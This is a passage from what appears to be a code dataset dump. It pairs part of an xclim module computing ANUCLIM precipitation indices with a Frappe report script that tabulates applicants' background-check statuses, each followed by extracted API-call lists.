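# of the original module). Fixture names follow the doctest examples used elsewhere
# in this file:
# >>> import xclim.indices as xci
# >>> p = xr.open_dataset(path_to_pr_file).pr
# >>> t = xr.open_dataset(path_to_tas_file).tas
# >>> pr_warm_qrt = xci.prcptot_warmcold_quarter(pr=p, tas=t, op='warmest', src_timestep='D')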
@declare_units(pr="[precipitation]")
def prcptot(
pr: xarray.DataArray, src_timestep: str = None, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM Accumulated total precipitation.
Parameters
----------
pr : xarray.DataArray
Total precipitation flux [mm d-1], [mm week-1], [mm month-1] or similar.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation.
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well.
"""
pram = rate2amount(pr)
return pram.resample(time=freq).sum(dim="time", keep_attrs=True)
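# Illustrative usage sketch for `prcptot` (added for clarity; not part of the original
# module). The fixture name follows the doctest examples used elsewhere in this file:
# >>> import xclim.indices as xci
# >>> p = xr.open_dataset(path_to_pr_file).pr
# >>> annual_pr = xci.prcptot(pr=p, src_timestep='D', freq='YS')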
# FIXME: src_timestep is not used here.
@declare_units(pr="[precipitation]")
def prcptot_wetdry_period(
pr: xarray.DataArray, *, op: str, src_timestep: str, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM precipitation of the wettest/driest day, week, or month, depending on the time step.
Parameters
----------
pr : xarray.DataArray
Total precipitation flux [mm d-1], [mm week-1], [mm month-1] or similar.
op : {'wettest', 'driest'}
Operation to perform : 'wettest' calculate wettest period ; 'driest' calculate driest period.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation of the {op} period.
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
pram = rate2amount(pr)
if op == "wettest":
return pram.resample(time=freq).max(dim="time", keep_attrs=True)
if op == "driest":
return pram.resample(time=freq).min(dim="time", keep_attrs=True)
raise NotImplementedError(
        f'Unknown operation "{op}"; op parameter must be one of "wettest" or "driest"'
)
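# Illustrative usage sketch for `prcptot_wetdry_period` (added for clarity; not part of
# the original module). The fixture name follows the doctest examples used elsewhere
# in this file:
# >>> import xclim.indices as xci
# >>> p = xr.open_dataset(path_to_pr_file).pr
# >>> wettest_period = xci.prcptot_wetdry_period(pr=p, op='wettest', src_timestep='D')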
def _anuclim_coeff_var(arr: xarray.DataArray) -> xarray.DataArray:
"""Calculate the annual coefficient of variation for ANUCLIM indices."""
std = arr.resample(time="YS").std(dim="time")
mu = arr.resample(time="YS").mean(dim="time")
return std / mu
def _from_other_arg(
criteria: xarray.DataArray, output: xarray.DataArray, op, freq: str
) -> xarray.DataArray:
"""Pick values from output based on operation returning an index from criteria.
Parameters
----------
criteria : DataArray
Series on which operation returning index is applied.
output : DataArray
Series to be indexed.
op : func
Function returning an index, for example np.argmin, np.argmax, np.nanargmin, np.nanargmax.
freq : str
Temporal grouping.
Returns
-------
DataArray
Output values where criteria is met at the given frequency.
"""
ds = xarray.Dataset(data_vars={"criteria": criteria, "output": output})
dim = "time"
def get_other_op(dataset):
all_nans = dataset.criteria.isnull().all(dim=dim)
index = op(dataset.criteria.where(~all_nans, 0), dim=dim)
return lazy_indexing(dataset.output, index=index, dim=dim).where(~all_nans)
return ds.resample(time=freq).map(get_other_op)
def _to_quarter(
freq: str,
pr: Optional[xarray.DataArray] = None,
tas: Optional[xarray.DataArray] = None,
) -> xarray.DataArray:
"""Convert daily, weekly or monthly time series to quarterly time series according to ANUCLIM specifications."""
if freq.upper().startswith("D"):
if tas is not None:
tas = tg_mean(tas, freq="7D")
if pr is not None:
# Accumulate on a week
# Ensure units are back to a "rate" for rate2amount below
pr = convert_units_to(precip_accumulation(pr, freq="7D"), "mm")
pr.attrs["units"] = "mm/week"
freq = "W"
if freq.upper().startswith("W"):
window = 13
elif freq.upper().startswith("M"):
window = 3
else:
raise NotImplementedError(
f'Unknown input time frequency "{freq}": must be one of "D", "W" or "M".'
)
if tas is not None:
tas = ensure_chunk_size(tas, time=np.ceil(window / 2))
if pr is not None:
pr = ensure_chunk_size(pr, time=np.ceil(window / 2))
if pr is not None:
pram = rate2amount(pr)
out = pram.rolling(time=window, center=False).sum()
out.attrs = pr.attrs
out.attrs["units"] = pram.units
if tas is not None:
out = tas.rolling(time=window, center=False).mean(skipna=False)
out.attrs = tas.attrs
out = ensure_chunk_size(out, time=-1)
return out
| [
"xclim.core.units.units",
"numpy.ceil",
"xclim.core.units.units2pint",
"xclim.core.units.convert_units_to",
"xarray.Dataset",
"xclim.core.units.rate2amount",
"xclim.core.utils.ensure_chunk_size",
"xclim.core.units.declare_units",
"xarray.set_options"
] | [((1421, 1482), 'xclim.core.units.declare_units', 'declare_units', ([], {'tasmin': '"""[temperature]"""', 'tasmax': '"""[temperature]"""'}), "(tasmin='[temperature]', tasmax='[temperature]')\n", (1434, 1482), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((2760, 2794), 'xclim.core.units.declare_units', 'declare_units', ([], {'tas': '"""[temperature]"""'}), "(tas='[temperature]')\n", (2773, 2794), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((4548, 4583), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""'}), "(pr='[precipitation]')\n", (4561, 4583), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((6563, 6597), 'xclim.core.units.declare_units', 'declare_units', ([], {'tas': '"""[temperature]"""'}), "(tas='[temperature]')\n", (6576, 6597), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((8529, 8585), 'xclim.core.units.declare_units', 'declare_units', ([], {'tas': '"""[temperature]"""', 'pr': '"""[precipitation]"""'}), "(tas='[temperature]', pr='[precipitation]')\n", (8542, 8585), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((10436, 10471), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""'}), "(pr='[precipitation]')\n", (10449, 10471), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((12570, 12626), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""', 'tas': '"""[temperature]"""'}), "(pr='[precipitation]', tas='[temperature]')\n", (12583, 12626), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((14495, 14530), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""'}), "(pr='[precipitation]')\n", (14508, 14530), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((15506, 15541), 'xclim.core.units.declare_units', 'declare_units', ([], {'pr': '"""[precipitation]"""'}), "(pr='[precipitation]')\n", (15519, 15541), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((4379, 4405), 'xclim.core.units.convert_units_to', 'convert_units_to', (['tas', '"""K"""'], {}), "(tas, 'K')\n", (4395, 4405), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((15378, 15393), 'xclim.core.units.rate2amount', 'rate2amount', (['pr'], {}), '(pr)\n', (15389, 15393), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((16719, 16734), 'xclim.core.units.rate2amount', 'rate2amount', (['pr'], {}), '(pr)\n', (16730, 16734), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((17961, 18027), 'xarray.Dataset', 'xarray.Dataset', ([], {'data_vars': "{'criteria': criteria, 'output': output}"}), "(data_vars={'criteria': criteria, 'output': output})\n", (17975, 18027), False, 'import xarray\n'), ((19730, 19761), 
'xclim.core.utils.ensure_chunk_size', 'ensure_chunk_size', (['out'], {'time': '(-1)'}), '(out, time=-1)\n', (19747, 19761), False, 'from xclim.core.utils import ensure_chunk_size\n'), ((2642, 2677), 'xarray.set_options', 'xarray.set_options', ([], {'keep_attrs': '(True)'}), '(keep_attrs=True)\n', (2660, 2677), False, 'import xarray\n'), ((4416, 4451), 'xarray.set_options', 'xarray.set_options', ([], {'keep_attrs': '(True)'}), '(keep_attrs=True)\n', (4434, 4451), False, 'import xarray\n'), ((6343, 6357), 'xclim.core.units.units2pint', 'units2pint', (['pr'], {}), '(pr)\n', (6353, 6357), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((6361, 6376), 'xclim.core.units.units', 'units', (['"""mm / s"""'], {}), "('mm / s')\n", (6366, 6376), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((6391, 6421), 'xclim.core.units.convert_units_to', 'convert_units_to', (['pr', '"""mm d-1"""'], {}), "(pr, 'mm d-1')\n", (6407, 6421), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((6432, 6467), 'xarray.set_options', 'xarray.set_options', ([], {'keep_attrs': '(True)'}), '(keep_attrs=True)\n', (6450, 6467), False, 'import xarray\n'), ((10263, 10298), 'xarray.set_options', 'xarray.set_options', ([], {'keep_attrs': '(True)'}), '(keep_attrs=True)\n', (10281, 10298), False, 'import xarray\n'), ((19447, 19462), 'xclim.core.units.rate2amount', 'rate2amount', (['pr'], {}), '(pr)\n', (19458, 19462), False, 'from xclim.core.units import convert_units_to, declare_units, pint_multiply, rate2amount, units, units2pint\n'), ((19303, 19322), 'numpy.ceil', 'np.ceil', (['(window / 2)'], {}), '(window / 2)\n', (19310, 19322), True, 'import numpy as np\n'), ((19387, 19406), 'numpy.ceil', 'np.ceil', (['(window / 2)'], {}), '(window / 2)\n', (19394, 19406), True, 'import numpy as np\n')] |
# Copyright (c) 2013, VHRS and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _, msgprint
from frappe.utils import (cint, cstr, date_diff, flt, getdate, money_in_words,
nowdate, rounded, today)
from datetime import datetime
from datetime import date
import datetime
from calendar import monthrange
def execute(filters=None):
columns = get_columns()
data = []
row = []
applicant = applicants(filters)
for app in applicant:
row = [app.customer, app.ref_id, app.candidate_name,
app.in_date, app.status, app.checks_group]
if app.status != "Entry Pending":
cg = frappe.get_doc("Checks Group", app.checks_group)
if cg.employment_check1 == 1:
emp = frappe.get_doc("Employment Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Employment Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.employment_check2 == 1:
emp = frappe.get_doc("Employment Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Employment Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.employment_check3 == 1:
emp = frappe.get_doc("Employment Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Employment Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.employment_check4 == 1:
emp = frappe.get_doc("Employment Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Employment Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.education_check1 == 1:
if frappe.db.exists("Education Check1", {
"applicant_id": app.ref_id}):
emp = frappe.get_doc("Education Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Education Check1", {
"applicant_id": app.ref_id})
                        row += [vemp.status]
                else:
                    # Keep the row aligned with the columns when the check is
                    # enabled but no "Education Check1" record exists yet.
                    row += ["-"]
            else:
                row += ["-"]
if cg.education_check2 == 1:
emp = frappe.get_doc("Education Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Education Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.education_check3 == 1:
emp = frappe.get_doc("Education Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Education Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.education_check4 == 1:
emp = frappe.get_doc("Education Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Education Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.address_check1 == 1:
emp = frappe.get_doc("Address Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Address Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.address_check2 == 1:
emp = frappe.get_doc("Address Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Address Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.address_check3 == 1:
emp = frappe.get_doc("Address Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Address Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.address_check4 == 1:
emp = frappe.get_doc("Address Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Address Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.family_check1 == 1:
emp = frappe.get_doc("Family Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Family Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.reference_check1 == 1:
emp = frappe.get_doc("Reference Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Reference Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.reference_check2 == 1:
emp = frappe.get_doc("Reference Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Reference Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.reference_check3 == 1:
emp = frappe.get_doc("Reference Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Reference Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.reference_check4 == 1:
emp = frappe.get_doc("Reference Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Reference Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.civil_check == 1:
emp = frappe.get_doc("Civil Check", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Civil Check", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.criminal_check == 1:
emp = frappe.get_doc("Criminal Check", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify Criminal Check", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check1 == 1:
emp = frappe.get_doc("ID Check1", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check1", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check2 == 1:
emp = frappe.get_doc("ID Check2", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check2", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check3 == 1:
emp = frappe.get_doc("ID Check3", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check3", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check4 == 1:
emp = frappe.get_doc("ID Check4", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check4", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check5 == 1:
emp = frappe.get_doc("ID Check5", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check5", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
if cg.id_check6 == 1:
emp = frappe.get_doc("ID Check6", {
"applicant_id": app.ref_id})
if emp.status != "Allocation Completed":
row += [emp.status]
else:
vemp = frappe.get_doc("Verify ID Check6", {
"applicant_id": app.ref_id})
row += [vemp.status]
else:
row += ["-"]
data.append(row)
return columns, data
def get_columns():
columns = [
_("Project Name") + ":Link/Customer:200",
_("VHRS Ref. No") + ":Data:150",
_("Candidate Name") + ":Data:180",
_("Start Date") + ":Date:150",
_("Status") + ":Data:150",
_("Checks Group Name") + ":Data:150",
_("Emp Check1 Status") + ":Data:150",
_("Emp Check2 Status") + ":Data:150",
_("Emp Check3 Status") + ":Data:150",
_("Emp Check4 Status") + ":Data:150",
_("Edu Check1 Status") + ":Data:150",
_("Edu Check2 Status") + ":Data:150",
_("Edu Check3 Status") + ":Data:150",
_("Edu Check4 Status") + ":Data:150",
_("Add Check1 Status") + ":Data:150",
_("Add Check2 Status") + ":Data:150",
_("Add Check3 Status") + ":Data:150",
_("Add Check4 Status") + ":Data:150",
_("Family Check Status") + ":Data:150",
_("Ref Check1 Status") + ":Data:150",
_("Ref Check2 Status") + ":Data:150",
_("Ref Check3 Status") + ":Data:150",
_("Ref Check4 Status") + ":Data:150",
_("Civil Check1 Status") + ":Data:150",
_("Criminal Check2 Status") + ":Data:150",
_("ID Check1 Status") + ":Data:150",
_("ID Check2 Status") + ":Data:150",
_("ID Check3 Status") + ":Data:150",
_("ID Check4 Status") + ":Data:150",
_("ID Check5 Status") + ":Data:150",
_("ID Check6 Status") + ":Data:150",
]
return columns
def applicants(filters):
applicant = frappe.db.sql(
"""select app.checks_group,app.customer,app.ref_id,app.candidate_name,app.in_date,app.status from `tabApplicant` app where
app.in_date between %(start_date)s and %(end_date)s order by app.in_date""", {
"start_date": filters.get("from_date"),
"end_date": filters.get("to_date")
}, as_dict=1)
return applicant
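# Illustrative invocation sketch (added for clarity; not part of the original report).
# The filter keys mirror the filters.get(...) calls in applicants(); the dates are
# hypothetical:
# >>> columns, data = execute({"from_date": "2018-01-01", "to_date": "2018-12-31"})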
| [
"frappe.db.exists",
"frappe.get_doc",
"frappe._"
] | [((751, 799), 'frappe.get_doc', 'frappe.get_doc', (['"""Checks Group"""', 'app.checks_group'], {}), "('Checks Group', app.checks_group)\n", (765, 799), False, 'import frappe\n'), ((12871, 12888), 'frappe._', '_', (['"""Project Name"""'], {}), "('Project Name')\n", (12872, 12888), False, 'from frappe import _, msgprint\n'), ((12921, 12938), 'frappe._', '_', (['"""VHRS Ref. No"""'], {}), "('VHRS Ref. No')\n", (12922, 12938), False, 'from frappe import _, msgprint\n'), ((12962, 12981), 'frappe._', '_', (['"""Candidate Name"""'], {}), "('Candidate Name')\n", (12963, 12981), False, 'from frappe import _, msgprint\n'), ((13005, 13020), 'frappe._', '_', (['"""Start Date"""'], {}), "('Start Date')\n", (13006, 13020), False, 'from frappe import _, msgprint\n'), ((13044, 13055), 'frappe._', '_', (['"""Status"""'], {}), "('Status')\n", (13045, 13055), False, 'from frappe import _, msgprint\n'), ((13079, 13101), 'frappe._', '_', (['"""Checks Group Name"""'], {}), "('Checks Group Name')\n", (13080, 13101), False, 'from frappe import _, msgprint\n'), ((13125, 13147), 'frappe._', '_', (['"""Emp Check1 Status"""'], {}), "('Emp Check1 Status')\n", (13126, 13147), False, 'from frappe import _, msgprint\n'), ((13171, 13193), 'frappe._', '_', (['"""Emp Check2 Status"""'], {}), "('Emp Check2 Status')\n", (13172, 13193), False, 'from frappe import _, msgprint\n'), ((13217, 13239), 'frappe._', '_', (['"""Emp Check3 Status"""'], {}), "('Emp Check3 Status')\n", (13218, 13239), False, 'from frappe import _, msgprint\n'), ((13263, 13285), 'frappe._', '_', (['"""Emp Check4 Status"""'], {}), "('Emp Check4 Status')\n", (13264, 13285), False, 'from frappe import _, msgprint\n'), ((13309, 13331), 'frappe._', '_', (['"""Edu Check1 Status"""'], {}), "('Edu Check1 Status')\n", (13310, 13331), False, 'from frappe import _, msgprint\n'), ((13355, 13377), 'frappe._', '_', (['"""Edu Check2 Status"""'], {}), "('Edu Check2 Status')\n", (13356, 13377), False, 'from frappe import _, msgprint\n'), ((13401, 13423), 'frappe._', '_', (['"""Edu Check3 Status"""'], {}), "('Edu Check3 Status')\n", (13402, 13423), False, 'from frappe import _, msgprint\n'), ((13447, 13469), 'frappe._', '_', (['"""Edu Check4 Status"""'], {}), "('Edu Check4 Status')\n", (13448, 13469), False, 'from frappe import _, msgprint\n'), ((13493, 13515), 'frappe._', '_', (['"""Add Check1 Status"""'], {}), "('Add Check1 Status')\n", (13494, 13515), False, 'from frappe import _, msgprint\n'), ((13539, 13561), 'frappe._', '_', (['"""Add Check2 Status"""'], {}), "('Add Check2 Status')\n", (13540, 13561), False, 'from frappe import _, msgprint\n'), ((13585, 13607), 'frappe._', '_', (['"""Add Check3 Status"""'], {}), "('Add Check3 Status')\n", (13586, 13607), False, 'from frappe import _, msgprint\n'), ((13631, 13653), 'frappe._', '_', (['"""Add Check4 Status"""'], {}), "('Add Check4 Status')\n", (13632, 13653), False, 'from frappe import _, msgprint\n'), ((13677, 13701), 'frappe._', '_', (['"""Family Check Status"""'], {}), "('Family Check Status')\n", (13678, 13701), False, 'from frappe import _, msgprint\n'), ((13725, 13747), 'frappe._', '_', (['"""Ref Check1 Status"""'], {}), "('Ref Check1 Status')\n", (13726, 13747), False, 'from frappe import _, msgprint\n'), ((13771, 13793), 'frappe._', '_', (['"""Ref Check2 Status"""'], {}), "('Ref Check2 Status')\n", (13772, 13793), False, 'from frappe import _, msgprint\n'), ((13817, 13839), 'frappe._', '_', (['"""Ref Check3 Status"""'], {}), "('Ref Check3 Status')\n", (13818, 13839), False, 'from frappe import _, 
msgprint\n'), ((13863, 13885), 'frappe._', '_', (['"""Ref Check4 Status"""'], {}), "('Ref Check4 Status')\n", (13864, 13885), False, 'from frappe import _, msgprint\n'), ((13909, 13933), 'frappe._', '_', (['"""Civil Check1 Status"""'], {}), "('Civil Check1 Status')\n", (13910, 13933), False, 'from frappe import _, msgprint\n'), ((13957, 13984), 'frappe._', '_', (['"""Criminal Check2 Status"""'], {}), "('Criminal Check2 Status')\n", (13958, 13984), False, 'from frappe import _, msgprint\n'), ((14008, 14029), 'frappe._', '_', (['"""ID Check1 Status"""'], {}), "('ID Check1 Status')\n", (14009, 14029), False, 'from frappe import _, msgprint\n'), ((14053, 14074), 'frappe._', '_', (['"""ID Check2 Status"""'], {}), "('ID Check2 Status')\n", (14054, 14074), False, 'from frappe import _, msgprint\n'), ((14098, 14119), 'frappe._', '_', (['"""ID Check3 Status"""'], {}), "('ID Check3 Status')\n", (14099, 14119), False, 'from frappe import _, msgprint\n'), ((14143, 14164), 'frappe._', '_', (['"""ID Check4 Status"""'], {}), "('ID Check4 Status')\n", (14144, 14164), False, 'from frappe import _, msgprint\n'), ((14188, 14209), 'frappe._', '_', (['"""ID Check5 Status"""'], {}), "('ID Check5 Status')\n", (14189, 14209), False, 'from frappe import _, msgprint\n'), ((14233, 14254), 'frappe._', '_', (['"""ID Check6 Status"""'], {}), "('ID Check6 Status')\n", (14234, 14254), False, 'from frappe import _, msgprint\n'), ((864, 929), 'frappe.get_doc', 'frappe.get_doc', (['"""Employment Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Employment Check1', {'applicant_id': app.ref_id})\n", (878, 929), False, 'import frappe\n'), ((1347, 1412), 'frappe.get_doc', 'frappe.get_doc', (['"""Employment Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Employment Check2', {'applicant_id': app.ref_id})\n", (1361, 1412), False, 'import frappe\n'), ((1830, 1895), 'frappe.get_doc', 'frappe.get_doc', (['"""Employment Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Employment Check3', {'applicant_id': app.ref_id})\n", (1844, 1895), False, 'import frappe\n'), ((2313, 2378), 'frappe.get_doc', 'frappe.get_doc', (['"""Employment Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Employment Check4', {'applicant_id': app.ref_id})\n", (2327, 2378), False, 'import frappe\n'), ((2792, 2858), 'frappe.db.exists', 'frappe.db.exists', (['"""Education Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check1', {'applicant_id': app.ref_id})\n", (2808, 2858), False, 'import frappe\n'), ((3419, 3483), 'frappe.get_doc', 'frappe.get_doc', (['"""Education Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check2', {'applicant_id': app.ref_id})\n", (3433, 3483), False, 'import frappe\n'), ((3899, 3963), 'frappe.get_doc', 'frappe.get_doc', (['"""Education Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check3', {'applicant_id': app.ref_id})\n", (3913, 3963), False, 'import frappe\n'), ((4379, 4443), 'frappe.get_doc', 'frappe.get_doc', (['"""Education Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check4', {'applicant_id': app.ref_id})\n", (4393, 4443), False, 'import frappe\n'), ((4857, 4919), 'frappe.get_doc', 'frappe.get_doc', (['"""Address Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Address Check1', {'applicant_id': app.ref_id})\n", (4871, 4919), False, 'import frappe\n'), ((5331, 5393), 'frappe.get_doc', 'frappe.get_doc', (['"""Address Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Address Check2', {'applicant_id': app.ref_id})\n", (5345, 5393), False, 'import 
frappe\n'), ((5805, 5867), 'frappe.get_doc', 'frappe.get_doc', (['"""Address Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Address Check3', {'applicant_id': app.ref_id})\n", (5819, 5867), False, 'import frappe\n'), ((6279, 6341), 'frappe.get_doc', 'frappe.get_doc', (['"""Address Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Address Check4', {'applicant_id': app.ref_id})\n", (6293, 6341), False, 'import frappe\n'), ((6752, 6813), 'frappe.get_doc', 'frappe.get_doc', (['"""Family Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Family Check1', {'applicant_id': app.ref_id})\n", (6766, 6813), False, 'import frappe\n'), ((7226, 7290), 'frappe.get_doc', 'frappe.get_doc', (['"""Reference Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Reference Check1', {'applicant_id': app.ref_id})\n", (7240, 7290), False, 'import frappe\n'), ((7706, 7770), 'frappe.get_doc', 'frappe.get_doc', (['"""Reference Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Reference Check2', {'applicant_id': app.ref_id})\n", (7720, 7770), False, 'import frappe\n'), ((8186, 8250), 'frappe.get_doc', 'frappe.get_doc', (['"""Reference Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Reference Check3', {'applicant_id': app.ref_id})\n", (8200, 8250), False, 'import frappe\n'), ((8666, 8730), 'frappe.get_doc', 'frappe.get_doc', (['"""Reference Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Reference Check4', {'applicant_id': app.ref_id})\n", (8680, 8730), False, 'import frappe\n'), ((9141, 9200), 'frappe.get_doc', 'frappe.get_doc', (['"""Civil Check"""', "{'applicant_id': app.ref_id}"], {}), "('Civil Check', {'applicant_id': app.ref_id})\n", (9155, 9200), False, 'import frappe\n'), ((9609, 9671), 'frappe.get_doc', 'frappe.get_doc', (['"""Criminal Check"""', "{'applicant_id': app.ref_id}"], {}), "('Criminal Check', {'applicant_id': app.ref_id})\n", (9623, 9671), False, 'import frappe\n'), ((10078, 10135), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check1"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check1', {'applicant_id': app.ref_id})\n", (10092, 10135), False, 'import frappe\n'), ((10537, 10594), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check2"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check2', {'applicant_id': app.ref_id})\n", (10551, 10594), False, 'import frappe\n'), ((10996, 11053), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check3"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check3', {'applicant_id': app.ref_id})\n", (11010, 11053), False, 'import frappe\n'), ((11455, 